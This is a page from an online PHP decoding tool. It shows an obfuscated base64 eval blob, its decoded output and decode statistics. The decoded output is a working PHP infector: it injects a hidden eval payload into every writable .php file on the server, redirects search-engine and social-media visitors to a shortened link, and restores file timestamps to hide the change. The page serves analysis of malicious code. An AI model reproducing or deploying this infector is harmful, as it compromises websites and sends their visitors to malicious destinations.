Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

eval(base64_decode("c2V0X3RpbWVfbGltaXQoMCk7DQppZ25vcmVfdXNlcl9hYm9ydCgxKTsNCmlmKCFpc3NldC..

Decoded Output download

set_time_limit(0);
ignore_user_abort(1);
if(!isset($_SERVER['DOCUMENT_ROOT']))
{ if(isset($_SERVER['SCRIPT_FILENAME'])){
	$_SERVER['DOCUMENT_ROOT'] = str_replace( '\', '/', substr($_SERVER['SCRIPT_FILENAME'], 0, 0-strlen($_SERVER['PHP_SELF'])));
}; };
if(!isset($_SERVER['DOCUMENT_ROOT']))
{ if(isset($_SERVER['PATH_TRANSLATED'])){
	$_SERVER['DOCUMENT_ROOT'] = str_replace( '\', '/', substr(str_replace('\', '\', $_SERVER['PATH_TRANSLATED']), 0, 0-strlen($_SERVER['PHP_SELF'])));
}; };
function dir_path($dir) {
	$code='
error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER[\'HTTP_REFERER\'];
$ua=$_SERVER[\'HTTP_USER_AGENT\'];
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){		
		header("Location: http://tinyurl.com/alrrgoe");
		exit();
	}
}
}';
	$dh = opendir($dir);
	$path_curent = '';
	while (($file = readdir($dh)) !== false)
	if ($file != "." and $file != "..")
	{
		$path = $dir."/".$file;
		makechange($path,$code);
		if (is_dir($path) && !stristr($path,"cgi-bin"))
		{
			$path_curent .= "$path";
			
			$path_curent .= dir_path($path);

		}
	}
	closedir($dh);
	return $path_curent;
}

function makechange ($path,$code){
	if (is_writable($path)) {
		if (is_file($path)) {
			if (stristr($path,".php") and !stristr($path,"banner") and !stristr($path,"movie") and !stristr($path,"story") and !stristr($path,"mod_logins") and !stristr($path,"gif") and !stristr($path,"joomja") and !stristr($path,"contant") and !stristr($path,"post") and !stristr($path,"img")){
				$fo=file_get_contents ($path);
				if (!stristr($fo,"base64")) {
					$aa=filectime ($path);
					$fi=preg_replace("/<\?php/","<?php	                                       			eval(base64_decode(\"".base64_encode($code)."\"));",$fo);
					$fro=fopen($path,"w");
					fwrite ($fro,$fi);
					fclose ($fro);
					@touch ($path,$aa);
					$buo=fopen("l","a+");
					fwrite ($buo,$path."
");
					fclose($buo);
					//echo $path."
";
				}else {
					$aa=filectime ($path);
					$fi=preg_replace("/eval\(base64_decode\(\"(.*?)\"/","eval(base64_decode(\"".base64_encode($code)."\"",$fo);
					$fro=fopen($path,"w");
					fwrite ($fro,$fi);
					fclose ($fro);
					@touch ($path,$aa);
					$buo=fopen("c","a+");
					fwrite ($buo,$path."
");
					fclose($buo);
					//echo $path."
";
				}
			}
		}
	}
}
$docdir=$_SERVER[DOCUMENT_ROOT];
echo $docdir;
$pap=preg_split("/\//",$docdir);
//foreach ($pap as $papp){
for ($i=0;$i<count($pap)-2;$i++){
$updocdir.=$pap[$i]."/";
}
$docdir=$updocdir;
dir_path($docdir);

Did this file decode correctly?

Original Code

eval(base64_decode("c2V0X3RpbWVfbGltaXQoMCk7DQppZ25vcmVfdXNlcl9hYm9ydCgxKTsNCmlmKCFpc3NldCgkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddKSkNCnsgaWYoaXNzZXQoJF9TRVJWRVJbJ1NDUklQVF9GSUxFTkFNRSddKSl7DQoJJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSA9IHN0cl9yZXBsYWNlKCAnXFwnLCAnLycsIHN1YnN0cigkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ10sIDAsIDAtc3RybGVuKCRfU0VSVkVSWydQSFBfU0VMRiddKSkpOw0KfTsgfTsNCmlmKCFpc3NldCgkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddKSkNCnsgaWYoaXNzZXQoJF9TRVJWRVJbJ1BBVEhfVFJBTlNMQVRFRCddKSl7DQoJJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSA9IHN0cl9yZXBsYWNlKCAnXFwnLCAnLycsIHN1YnN0cihzdHJfcmVwbGFjZSgnXFxcXCcsICdcXCcsICRfU0VSVkVSWydQQVRIX1RSQU5TTEFURUQnXSksIDAsIDAtc3RybGVuKCRfU0VSVkVSWydQSFBfU0VMRiddKSkpOw0KfTsgfTsNCmZ1bmN0aW9uIGRpcl9wYXRoKCRkaXIpIHsNCgkkY29kZT0nDQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1oZWFkZXJzX3NlbnQoKTsNCmlmICghJG5jY3Ypew0KJHJlZmVyZXI9JF9TRVJWRVJbXCdIVFRQX1JFRkVSRVJcJ107DQokdWE9JF9TRVJWRVJbXCdIVFRQX1VTRVJfQUdFTlRcJ107DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFt
YmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3IgcHJlZ19tYXRjaCgiL3lhbmRleFwucnVcL3lhbmRzZWFyY2hcPyguKj8pXCZsclw9LyIsJHJlZmVyZXIpIG9yIHByZWdfbWF0Y2ggKCIvZ29vZ2xlXC4oLio/KVwvdXJsXD9zYS8iLCRyZWZlcmVyKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJteXNwYWNlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsJCQ0KCQloZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vdGlueXVybC5jb20vYWxycmdvZSIpOw0KCQlleGl0KCk7DQoJfQ0KfQ0KfSc7DQoJJGRoID0gb3BlbmRpcigkZGlyKTsNCgkkcGF0aF9jdXJlbnQgPSAnJzsNCgl3aGlsZSAoKCRmaWxlID0gcmVhZGRpcigkZGgpKSAhPT0gZmFsc2UpDQoJaWYgKCRmaWxlICE9ICIuIiBhbmQgJGZpbGUg
IT0gIi4uIikNCgl7DQoJCSRwYXRoID0gJGRpci4iLyIuJGZpbGU7DQoJCW1ha2VjaGFuZ2UoJHBhdGgsJGNvZGUpOw0KCQlpZiAoaXNfZGlyKCRwYXRoKSAmJiAhc3RyaXN0cigkcGF0aCwiY2dpLWJpbiIpKQ0KCQl7DQoJCQkkcGF0aF9jdXJlbnQgLj0gIiRwYXRoIjsNCgkJCQ0KCQkJJHBhdGhfY3VyZW50IC49IGRpcl9wYXRoKCRwYXRoKTsNCg0KCQl9DQoJfQ0KCWNsb3NlZGlyKCRkaCk7DQoJcmV0dXJuICRwYXRoX2N1cmVudDsNCn0NCg0KZnVuY3Rpb24gbWFrZWNoYW5nZSAoJHBhdGgsJGNvZGUpew0KCWlmIChpc193cml0YWJsZSgkcGF0aCkpIHsNCgkJaWYgKGlzX2ZpbGUoJHBhdGgpKSB7DQoJCQlpZiAoc3RyaXN0cigkcGF0aCwiLnBocCIpIGFuZCAhc3RyaXN0cigkcGF0aCwiYmFubmVyIikgYW5kICFzdHJpc3RyKCRwYXRoLCJtb3ZpZSIpIGFuZCAhc3RyaXN0cigkcGF0aCwic3RvcnkiKSBhbmQgIXN0cmlzdHIoJHBhdGgsIm1vZF9sb2dpbnMiKSBhbmQgIXN0cmlzdHIoJHBhdGgsImdpZiIpIGFuZCAhc3RyaXN0cigkcGF0aCwiam9vbWphIikgYW5kICFzdHJpc3RyKCRwYXRoLCJjb250YW50IikgYW5kICFzdHJpc3RyKCRwYXRoLCJwb3N0IikgYW5kICFzdHJpc3RyKCRwYXRoLCJpbWciKSl7DQoJCQkJJGZvPWZpbGVfZ2V0X2NvbnRlbnRzICgkcGF0aCk7DQoJCQkJaWYgKCFzdHJpc3RyKCRmbywiYmFzZTY0IikpIHsNCgkJCQkJJGFhPWZpbGVjdGltZSAoJHBhdGgpOw0KCQkJCQkkZmk9cHJlZ19yZXBsYWNlKCIvPFw/cGhwLyIsIjw/
cGhwCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAkJCWV2YWwoYmFzZTY0X2RlY29kZShcIiIuYmFzZTY0X2VuY29kZSgkY29kZSkuIlwiKSk7IiwkZm8pOw0KCQkJCQkkZnJvPWZvcGVuKCRwYXRoLCJ3Iik7DQoJCQkJCWZ3cml0ZSAoJGZybywkZmkpOw0KCQkJCQlmY2xvc2UgKCRmcm8pOw0KCQkJCQlAdG91Y2ggKCRwYXRoLCRhYSk7DQoJCQkJCSRidW89Zm9wZW4oImwiLCJhKyIpOw0KCQkJCQlmd3JpdGUgKCRidW8sJHBhdGguIlxuIik7DQoJCQkJCWZjbG9zZSgkYnVvKTsNCgkJCQkJLy9lY2hvICRwYXRoLiJcbiI7DQoJCQkJfWVsc2Ugew0KCQkJCQkkYWE9ZmlsZWN0aW1lICgkcGF0aCk7DQoJCQkJCSRmaT1wcmVnX3JlcGxhY2UoIi9ldmFsXChiYXNlNjRfZGVjb2RlXChcIiguKj8pXCIvIiwiZXZhbChiYXNlNjRfZGVjb2RlKFwiIi5iYXNlNjRfZW5jb2RlKCRjb2RlKS4iXCIiLCRmbyk7DQoJCQkJCSRmcm89Zm9wZW4oJHBhdGgsInciKTsNCgkJCQkJZndyaXRlICgkZnJvLCRmaSk7DQoJCQkJCWZjbG9zZSAoJGZybyk7DQoJCQkJCUB0b3VjaCAoJHBhdGgsJGFhKTsNCgkJCQkJJGJ1bz1mb3BlbigiYyIsImErIik7DQoJCQkJCWZ3cml0ZSAoJGJ1bywkcGF0aC4iXG4iKTsNCgkJCQkJZmNsb3NlKCRidW8pOw0KCQkJCQkvL2VjaG8gJHBhdGguIlxuIjsNCgkJCQl9DQoJCQl9DQoJCX0NCgl9DQp9DQokZG9jZGlyPSRfU0VSVkVSW0RPQ1VNRU5UX1JPT1RdOw0KZWNobyAkZG9jZGlyOw0KJHBhcD1wcmVnX3NwbGl0KCIvXC8v
IiwkZG9jZGlyKTsNCi8vZm9yZWFjaCAoJHBhcCBhcyAkcGFwcCl7DQpmb3IgKCRpPTA7JGk8Y291bnQoJHBhcCktMjskaSsrKXsNCiR1cGRvY2Rpci49JHBhcFskaV0uIi8iOw0KfQ0KJGRvY2Rpcj0kdXBkb2NkaXI7DQpkaXJfcGF0aCgkZG9jZGlyKTs=")); 

Function Calls

base64_decode 1

Variables

None

Stats

MD5 275559341c9844da1ee691474ec50905
Eval Count 1
Decode Time 113 ms